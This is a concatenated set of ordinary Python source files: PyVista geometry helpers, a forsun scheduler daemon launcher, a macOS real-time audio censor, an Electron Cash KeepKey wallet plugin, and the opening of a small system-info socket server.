"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
points : numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
Prefix may be empty, and extension will default to ``'.jpg'``
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
path : str, optional
Directory containing the cubemap images.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}')
texture = pyvista.Texture()
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
|
forsund.py
|
# -*- coding: utf-8 -*-
# 15/6/27
# create by: snower
from __future__ import absolute_import, division, print_function, with_statement
import os
import sys
import argparse
import multiprocessing
import atexit
from ..forsun import config
from ..utils import is_py3
parser = argparse.ArgumentParser(description='High-performance timing scheduling service')
parser.add_argument('--conf', dest='conf', default="", help='conf filename')
parser.add_argument('--bind', dest='bind_host', default="", help='bind host (default: 127.0.0.1)')
parser.add_argument('--port', dest='bind_port', default=0, type=int, help='bind port (default: 6458)')
parser.add_argument('--http', dest='http_bind', default="", help='bind http server (default: ) example: 127.0.0.1:80')
parser.add_argument('--demon', dest='demon', nargs='?', const=True, default=False, type=bool, help='run demon mode')
parser.add_argument('--nodemon', dest='nodemon', nargs='?', const=True, default=False, type=bool, help='run no demon mode')
parser.add_argument('--log', dest='log_file', default='', type=str, help='log file')
parser.add_argument('--log-level', dest='log_level', default='', type=str, help='log level (defaul: INFO)')
parser.add_argument('--driver', dest='driver', default='', type=str, help='store driver mem or redis (defaul: mem)')
parser.add_argument('--driver-mem-store-file', dest='store_mem_store_file', default='', type=str, help='store mem driver store file (defaul: ~/.forsun.dump)')
parser.add_argument('--driver-redis-host', dest='driver_redis_host', default='', type=str, help='store reids driver host (defaul: 127.0.0.1)')
parser.add_argument('--driver-redis-port', dest='driver_redis_port', default=0, type=int, help='store reids driver port (defaul: 6379)')
parser.add_argument('--driver-redis-db', dest='driver_redis_db', default=0, type=int, help='store reids driver db (defaul: 0)')
parser.add_argument('--driver-redis-password', dest='driver_redis_password', default='', type=str, help='store reids driver password (defaul: )')
parser.add_argument('--driver-redis-prefix', dest='driver_redis_prefix', default='', type=str, help='store reids driver key prefix (defaul: forsun)')
parser.add_argument('--driver-redis-server-id', dest='driver_redis_server_id', default=0, type=int, help='store reids driver server id (defaul: 0)')
parser.add_argument('--extension-path', dest='extension_path', default='', type=str, help='extension path')
parser.add_argument('--extension', dest='extensions', default=[], action="append", type=str, help='extension name')
def main():
args = parser.parse_args()
if args.conf:
try:
config.load_conf(args.conf)
except Exception as e:
print("load conf file error ", str(e))
exit(1)
if args.log_file:
config.set("LOG_FILE", args.log_file)
if args.log_level:
config.set("LOG_LEVEL", args.log_level)
if args.bind_host:
config.set("BIND_ADDRESS", args.bind_host)
if args.bind_port:
config.set("PORT", args.bind_port)
if args.http_bind:
config.set("HTTP_BIND", args.http_bind)
if args.driver:
config.set("STORE_DRIVER", args.driver)
if args.driver_redis_host:
config.set("STORE_REDIS_HOST", args.driver_redis_host)
if args.driver_redis_port:
config.set("STORE_REDIS_PORT", args.driver_redis_port)
if args.driver_redis_db:
config.set("STORE_REDIS_DB", args.driver_redis_db)
if args.driver_redis_password:
config.set("STORE_REDIS_PASSWORD", args.driver_redis_password)
if args.driver_redis_prefix:
config.set("STORE_REDIS_PREFIX", args.driver_redis_prefix)
if args.driver_redis_server_id:
config.set("STORE_REDIS_SERVER_ID", args.driver_redis_server_id)
if args.extension_path:
config.set("EXTENSION_PATH", args.extension_path)
if args.extensions:
config.set("EXTENSIONS", args.extensions)
if not args.nodemon:
from ..forsun import Forsun
def on_start(forsun):
print("forsund started by pid %s" % p.pid)
sys.stdin.close()
sys.stdin = open(os.devnull)
sys.stdout.close()
sys.stdout = open(os.devnull, 'w')
sys.stderr.close()
sys.stderr = open(os.devnull, 'w')
def run():
try:
forsun = Forsun()
forsun.serve(on_start)
except Exception as e:
print(e)
exit(1)
p = multiprocessing.Process(target = run, name=" ".join(sys.argv))
p.start()
if is_py3:
atexit._clear()
else:
atexit._exithandlers = []
else:
try:
from ..forsun import Forsun
forsun = Forsun()
forsun.serve()
except Exception as e:
print(e)
exit(1)
if __name__ == "__main__":
main()
|
censor_realtime_mac.py
|
""" Censors audio chunks in a continuous stream """
import os
import threading
import sounddevice as sd
import soundfile as sf
from pydub import AudioSegment
from audio import improve_accuracy, convert_and_write_chunk, \
read_and_convert_audio
from utils import create_env_var, create_temp_dir, append_before_ext, \
time_filename, MacUtil, CHUNK_LEN
from .censor import Censor
class CensorRealtimeMac(Censor):
""" Removes explicits from audio stream in real-time """
running = True
def __init__(self, args, explicits):
print('Initialzed realtime censor object')
super().__init__(explicits, args.output_encoding, args.output_location)
self.__switch_audio_source()
create_env_var('CLEANSIO_CHUNKS_LIST', '[]')
self.args = args
self.directory = create_temp_dir()
self.chunk_prefix = self.directory + time_filename() + '-'
self.temp_chunk_filepath = self.directory + 'temp_chunk.wav'
self.__update_env_chunks_list(self.temp_chunk_filepath)
self.clean_file = AudioSegment.empty()
self.processing_queue = []
self.processing_lock = threading.Lock()
self.playback_queue = []
self.playback_lock = threading.Lock()
self.samplerate = 44100 # Hertz
self.duration = 5 # seconds
def censor(self):
""" Censors audio chunks in a continuous stream """
# Start thread that will analyze and censor recorded chunks
processing_thread = threading.Thread(target=self.run)
processing_thread.daemon = True
processing_thread.start()
try:
# Device indexes in sd.default.device should have already been set
# to Soundflower (2ch) for input and Built-in Output for output.
# Capture stream from Soundflower (2ch) & play to Built-in Output
with sd.Stream(samplerate=self.samplerate,
blocksize=int(self.samplerate*self.duration),
channels=1, callback=self.callback,
finished_callback=self.finished_callback):
print('#' * 80)
print('Press Return to stop censoring')
print('#' * 80)
input()
except KeyboardInterrupt:
print('\nInterrupted by user')
CensorRealtimeMac.running = False
except Exception as exception:
print(type(exception).__name__ + ': ' + str(exception))
CensorRealtimeMac.running = False
def callback(self, indata, outdata, _, __, status):
""" Process audio data from Stream """
if status:
print(status)
# Add to processing_queue
with self.processing_lock:
self.processing_queue.append(indata.copy())
# Consume playback_queue
with self.playback_lock:
if self.playback_queue:
outdata[:] = self.playback_queue.pop(0)
else:
outdata.fill(0)
def finished_callback(self):
""" Once stream is inactive, output cleaned recordings to audio file """
if self.args.store_recording:
trailing_audio_length = len(self.playback_queue) * CHUNK_LEN
if trailing_audio_length > 0:
self.clean_file = self.clean_file[:-trailing_audio_length]
self.create_clean_file(self.clean_file)
else:
self.print_explicits_count()
def run(self):
""" Process 10 seconds of captured audio data at a time """
index = 0
leftover_mute = 0
while True:
if not CensorRealtimeMac.running:
break
with self.processing_lock:
processing_queue_length = len(self.processing_queue)
if processing_queue_length >= 2:
with self.processing_lock:
frames_to_process = self.processing_queue.pop(0)
next_frames = self.processing_queue[0]
# Convert next two recordings into chunks
recorded_chunk, file_path = \
self.__convert_frames_to_chunk(frames_to_process, index)
next_recorded_chunk, _ = \
self.__convert_frames_to_chunk(next_frames, index+1)
overlapping_chunk, overlapping_path = \
self.__create_overlapping_chunk(recorded_chunk,
next_recorded_chunk,
file_path)
# Create accuracy chunk for current chunk and overlapping chunk
self.__create_accuracy_chunk(recorded_chunk, file_path)
self.__create_accuracy_chunk(overlapping_chunk, overlapping_path)
# Censor current chunk and also mute any spillover explicits
# from previous chunk
clean_chunk_wrapper = self.censor_audio_chunk(file_path)
clean_chunk = AudioSegment.silent(duration=leftover_mute) \
+ clean_chunk_wrapper.segment[leftover_mute:]
# Remember to mute any overlapping explicit in the next chunk
leftover_mute = clean_chunk_wrapper.mute_next_start
# Convert current chunk into frames and add it to the playback
# queue
clean_frames = self.__convert_clean_chunk_to_frames(clean_chunk)
with self.playback_lock:
self.playback_queue.append(clean_frames)
if self.args.store_recording:
self.clean_file += clean_chunk
index += 1
def __convert_frames_to_chunk(self, frames, index):
file_path = self.chunk_prefix + str(index) +'.wav'
sf.write(file_path, frames, self.samplerate)
self.__update_env_chunks_list(file_path)
recorded_chunk = read_and_convert_audio(file_path)
return recorded_chunk, file_path
def __convert_clean_chunk_to_frames(self, chunk):
chunk.export(self.temp_chunk_filepath, format='wav')
clean_frames, _ = sf.read(self.temp_chunk_filepath,
dtype='float32',
fill_value=0.0,
frames=int(self.samplerate*self.duration),
always_2d=True)
return clean_frames
def __create_overlapping_chunk(self, chunk1, chunk2, file_path):
overlapping_chunk = chunk1[2500:] + chunk2[:2500]
overlapping_path = append_before_ext(file_path, '-overlapping')
convert_and_write_chunk(overlapping_chunk, overlapping_path, 'wav')
self.__update_env_chunks_list(overlapping_path)
return overlapping_chunk, overlapping_path
def __create_accuracy_chunk(self, chunk, file_path):
accuracy_chunk_file_path = append_before_ext(file_path, '-accuracy')
accuracy_chunk = improve_accuracy(chunk)
convert_and_write_chunk(accuracy_chunk, accuracy_chunk_file_path, 'wav')
@classmethod
def __switch_audio_source(cls):
create_env_var('CLEANSIO_OLD_SOUND_OUT', MacUtil.audio_source('output'))
create_env_var('CLEANSIO_OLD_SOUND_IN', MacUtil.audio_source('input'))
MacUtil.switch_audio_source('output', 'Soundflower (2ch)')
MacUtil.switch_audio_source('input', 'Soundflower (2ch)')
cls.__set_default_device('Soundflower (2ch)', 'Built-in Output')
@classmethod
def __set_default_device(cls, input_device_name, output_device_name):
device_index = 0
input_device_index = 2 # Soundflower (2ch) is usually no. 2
output_device_index = 1 # Built-in Output is usually no. 1
for device in sd.query_devices():
if device['name'] == input_device_name:
input_device_index = device_index
if device['name'] == output_device_name:
output_device_index = device_index
device_index += 1
sd.default.device = (input_device_index, output_device_index)
@classmethod
def __update_env_chunks_list(cls, file_path):
""" Call after every write for later cleanup """
env_list = os.environ['CLEANSIO_CHUNKS_LIST']
beginning = '[\'' if env_list[:-1] == '[' else env_list[:-1] + ', \''
create_env_var(
'CLEANSIO_CHUNKS_LIST', beginning + file_path + '\']')
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electroncash.util import bfh, bh2u, UserCancelled
from electroncash.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT, deserialize_xpub
from electroncash import networks
from electroncash.i18n import _
from electroncash.transaction import deserialize, Transaction
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electroncash.address import Address
from electroncash.plugins import Device
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password, *, use_cache=False):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise RuntimeError(_('Offline signing with {} is not supported.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
usb_context = None
SUPPORTED_XTYPES = ('standard', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
from usb1 import USBContext
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.enumerate)
self.usb_context = USBContext()
self.usb_context.open()
self.libraries_available = True
except ImportError:
self.libraries_available = False
def libusb_enumerate(self):
from keepkeylib.transport_webusb import DEVICE_IDS
for dev in self.usb_context.getDeviceIterator(skip_on_error=True):
usb_id = (dev.getVendorID(), dev.getProductID())
if usb_id in DEVICE_IDS:
yield dev
def _USBDevice_getPath(self, dev):
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def enumerate(self):
for dev in self.libusb_enumerate():
path = self._USBDevice_getPath(dev)
usb_id = (dev.getVendorID(), dev.getProductID())
yield Device(path=path, interface_number=-1, id_=path, product_key=usb_id, usage_page=0)
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in self.libusb_enumerate():
path = self._USBDevice_getPath(dev)
if path == device.path:
return WebUsbTransport(dev)
self.print_error(f"cannot connect at {device.path}: not found")
return None
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at {} {}".format(device.path, e))
return None
def _try_webusb(self, device):
self.print_error("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.print_error("cannot connect at {} {}".format(device.path, e))
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at {}".format(device.path))
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed {}".format(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise RuntimeError(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Doesn't support testnet addresses
return "BitcoinCash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.print_error(str(e))
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
item = str(item).strip()
if not len(item.split()) in [12, 18, 24]:
raise Exception(_("The mnemonic needs to be 12, 18 or 24 words."))
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(item, pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise RuntimeError(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise RuntimeError(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures, signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)
signatures = [bh2u(x) for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
keepkey_script_type = self.get_keepkey_output_script_type(script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=keepkey_script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=keepkey_script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = validate_op_return_output_and_get_data(o, max_pushes=1)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address.to_full_string(Address.FMT_CASHADDR, net=networks.MainNet)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m, script_type = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
server.py
|
from socket import *
import threading
from hardware import Hardware
from storage import Storage
from physicalMemory import PhysicalMemory
from swap import Swap
from datetime import datetime
import subprocess
#initialize objects
h = Hardware()
m = PhysicalMemory()
s = Swap()
st = Storage()
logAccess = {}
def analyze(byteMessage):
message = byteMessage.decode('utf-8')
if 'hard' in message:
return analyzeHardware(message).encode('utf-8')
elif 'mem' in message:
return analyzePhysicalMemory(message).encode('utf-8')
elif 'swap' in message:
return analyzeSwap(message).encode('utf-8')
elif 'stor' in message:
return analyzeStorage(message)
elif 'netstat' in message:
return checkConnection()
elif 'log' in message:
return log().encode('utf-8')
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def analyzeHardware(message):
if message == 'hardware --arch':
return h.getArchitecture()
elif message == 'hardware --mod':
return h.getModelName()
elif message == 'hardware --cache':
return h.getCache()
elif message == 'hardware':
return h.getArchitecture() + '\n' + h.getModelName() + '\n' + h.getCache()
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def analyzePhysicalMemory(message):
if message == 'mem --total':
return m.getTotalMemory()
elif message == 'mem --free':
return m.getFreeMemory()
elif message == 'mem --avail':
return m.getAvailableMemory()
elif message == 'mem':
return m.getTotalMemory() + '\n' + m.getFreeMemory() + '\n' + m.getAvailableMemory()
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def analyzeSwap(message):
if message == 'swap --total':
return s.getTotalSwap()
elif message == 'swap --free':
return s.getFreeSwap()
elif message == 'swap --avail':
return s.getAvailableSwap()
elif message == 'swap':
return s.getTotalSwap() + '\n' + s.getFreeSwap() + '\n' + s.getAvailableSwap()
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def analyzeStorage(message):
if message == 'stor --total':
return st.getTotalStorage()
elif message == 'stor --avail':
return st.getAvailableStorage()
elif message == 'stor --used':
return st.getUsedStorage()
elif message == 'stor':
return st.getAll()
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def checkConnection():
return subprocess.check_output("ping -c1 google.com && echo \"*****INTERNET ONLINE*****\" || echo \"*****INTERNET OFFLINE*****\"", shell=True)
def log():
return str(logAccess)
def usage():
return('USAGE:\n\n\
hardware -> return hardware usage info\n\
--arch architecture of the hardware\n\
--mod model info like Intel or AMD with core and clock\n\
--cache cache info of the computer')
serverPort = 12001
serverSocket = socket(AF_INET,SOCK_STREAM)
serverSocket.bind(('',serverPort))
print('The server is ready to receive')
serverSocket.listen(1)
lock = threading.Lock()
